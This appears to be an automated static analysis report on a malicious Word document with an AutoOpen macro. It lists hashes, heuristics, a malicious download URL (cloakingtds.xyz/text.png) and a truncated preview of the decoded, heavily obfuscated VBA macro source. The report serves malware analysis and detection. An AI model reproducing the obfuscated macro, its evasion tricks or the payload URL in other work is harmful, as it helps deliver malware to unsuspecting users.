Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7d3116e7f9360433…

MALICIOUS

Office (OLE)

268.5 KB Created: 2018-05-28 10:20:00 Authoring application: Microsoft Office Word First seen: 2018-06-14
MD5: dd4ff12cfc5e59e754e231a35e938904 SHA-1: e0933f24844c80c719606045f93401542f865e04 SHA-256: 7d3116e7f936043344f2f001444da0fa2bb436d51a0d15e798e8359c347e5706
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a legacy WordBasic AutoOpen macro that utilizes CreateObject, indicating an attempt to execute arbitrary code. The macro is obfuscated, but the presence of AutoOpen and CreateObject strongly suggests it's designed to download and execute a second-stage payload from the embedded URL http://cloakingtds.xyz/text.png.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://cloakingtds.xyz/text.png In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 89609 bytes
SHA-256: 29a44fe509832ed6812890e5893dca46215f6846b637aa4585c3f606c508a77f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "S2LtTH"
Public Function GoN2cHN8Hl8Wplu(ByRef fkZsTV0EmzV4kx As String, ByRef THREE As String) As String
Dim CpbmowGaeRkkEHM() As Byte
Dim j2KH3ANjcL3rUWb As String
j2KH3ANjcL3rUWb = Application.UserName
Dim yn92iHD8HJSwgmf3M, y6SrZGWczRzJKnOkDcL As Integer
y6SrZGWczRzJKnOkDcL = Len(j2KH3ANjcL3rUWb)
Dim PNA9KVMsYeyXErHD As Collection
While y6SrZGWczRzJKnOkDcL > 5
yn92iHD8HJSwgmf3M = yn92iHD8HJSwgmf3M + 4
y6SrZGWczRzJKnOkDcL = y6SrZGWczRzJKnOkDcL - 1
Wend
Dim lMWZ1ulOXFIXles As Collection
Set lMWZ1ulOXFIXles = New Collection
lMWZ1ulOXFIXles.Add "dlha7z18Wp4LpbGWeqKKBT4locG39wI0M8O5UpaeIsfz3"
lMWZ1ulOXFIXles.Add "EPByTVOfKq5wfr88"
lMWZ1ulOXFIXles.Add "D9rNKCxQqBSyHrmxCo87xf7cEPZ24wKt4Q0C50E98DpNMViNKppTAnriBOI5m6V31"
lMWZ1ulOXFIXles.Add "01j3Lj98vxuQsqLsOG0tRjSBrsJWCrvWobrWkweuBo5sQ8ZPaOGwAxmRjiMdam6DDYlR8"
lMWZ1ulOXFIXles.Add "cmGsnojusS35zl8VyxazCjBTYr1p1WIQlGnK3H8n9zdKgrIcEDwbhCF2lwT5w42WJnTr8ybr1wzPG0wriZ"
lMWZ1ulOXFIXles.Add "jrtjBujHzC0F4GB3XbeQlFkuPxwuAmWXUEzc3upNPU4y6rU9x2TH4TNeG8UL8yGKqcv0"
Dim onzEjO1rdKepExe As String
onzEjO1rdKepExe = Application.UserName
Dim Dmt33qyKqDNvQgLEF, JRGZn3h4jptFUt6sKln As Integer
JRGZn3h4jptFUt6sKln = Len(onzEjO1rdKepExe)
Dim BKRje7Ayj61bfckZ As Collection
While JRGZn3h4jptFUt6sKln > 7
Dmt33qyKqDNvQgLEF = Dmt33qyKqDNvQgLEF + 6
JRGZn3h4jptFUt6sKln = JRGZn3h4jptFUt6sKln - 1
Wend
Dim SJq9GE6xTGX5pV8 As Collection
Set SJq9GE6xTGX5pV8 = New Collection
SJq9GE6xTGX5pV8.Add "beS9UqENzLtEuW8WXEv6e7ad1JLOSXbf7OgQSVvImnYEwKKZmpW1oumdEyIKf05atNHfxsE"
SJq9GE6xTGX5pV8.Add "nU0jVqr8vlnAk"
SJq9GE6xTGX5pV8.Add "mDMdNkmws7UiDpk4kViAav4sIaLtOSaJV43vglzsAiIlBHnTLrCoC1v1IdUwY2hagLNIvyX9i091mSrAz2"
SJq9GE6xTGX5pV8.Add "PvHeJCnCQATIBsFx4fiXTCGL14OxwU9gUAKuEs9sKVthh104N1GRTKN"
SJq9GE6xTGX5pV8.Add "5mOyzQ6BwzAhUvMfxN8SjoAETm5"
If Application.UserName = "KtFNLbkvncz" Then
MsgBox ("AjHWZDXq5ha")
Else
Dim xuxU5sNgC91cka As Integer
End If
Dim hHYfBYMYkfNLIzE9nv() As Byte
Dim EEm7nrziWhcF0Y As Integer
Dim huUQBYQTdmR As String
EEm7nrziWhcF0Y = 5882
Dim NOSvgXjccWm As Integer
huUQBYQTdmR = Right(CStr(EEm7nrziWhcF0Y), Chr(Tan(CDbl(1.55039099610836))))
NOSvgXjccWm = CInt(huUQBYQTdmR)
For ikSneTJEZx3 = NOSvgXjccWm To 41
EEm7nrziWhcF0Y = EEm7nrziWhcF0Y + 6
Next ikSneTJEZx3
If Chr(Tan(CDbl(1.55903216364514))) = U Then
Dim UNbWniEFo0KUkB As String
Dim i44J9fT4gMf As String
i44J9fT4gMf = dtlquUXLmMz
UNbWniEFo0KUkB = MB05tufCcDb
End If
If (StrComp(UNbWniEFo0KUkB, i44J9fT4gMf, vbTextCompare) <> 0) Then
MsgBox ("zaxDO3a0eqO0Dx")
End If
Dim xeNy7FhojmsfKn, Fdm2gw1AAwW As Integer
xeNy7FhojmsfKn = 1
Fdm2gw1AAwW = 4
#If EVhRDzcdY2J <> 0 Then
EVhRDzcdY2J = EVhRDzcdY2J + 5
Dim DRQX1Qfo0sQ As Variant
Else
Dim DRQX1Qfo0sQ As Object
#End If
If xeNy7FhojmsfKn > Fdm2gw1AAwW Then
For jQse2K5p6eab1u = Fdm2gw1AAwW To xeNy7FhojmsfKn
Fdm2gw1AAwW = Fdm2gw1AAwW / xeNy7FhojmsfKn
Next jQse2K5p6eab1u
End If
If Chr(Tan(CDbl(1.55903216364514))) = U Then
Dim NC9EbIdwCEty64 As String
Dim xeDxSveOeEr As String
xeDxSveOeEr = agV9Vv6OapP
NC9EbIdwCEty64 = codgJDViGEC
End If
If (StrComp(NC9EbIdwCEty64, xeDxSveOeEr, vbTextCompare) <> 0) Then
MsgBox ("vnLaEBioAh5X6l")
End If
Dim aq6OAsO7MHl8ue, AZ9wn13uj8T As Integer
aq6OAsO7MHl8ue = 4
AZ9wn13uj8T = 4
#If Hx1jLQqnH65 <> 0 Then
Hx1jLQqnH65 = Hx1jLQqnH65 + 1
Dim oj47qtjhGog As Variant
Else
Dim oj47qtjhGog As Object
#End If
If aq6OAsO7MHl8ue > AZ9wn13uj8T Then
For C3mR0mcluG7413 = AZ9wn13uj8T To aq6OAsO7MHl8ue
AZ9wn13uj8T = AZ9wn13uj8T / aq6OAsO7MHl8ue
Next C3mR0mcluG7413
End If
Dim tpmw873ZDKgLyx As Integer
For q9176SbjEEP = 3 To 32
tpmw873ZDKgLyx = q9176SbjEEP
Next q9176SbjEEP
If Chr(Tan(CDbl(1.55956084453693))) = Y Then
Dim W1JGVQzu0l0zoV As String
Dim kVtRJ8CbG2E As String
kVtRJ8CbG2E = guuZz645ZPT

... (truncated)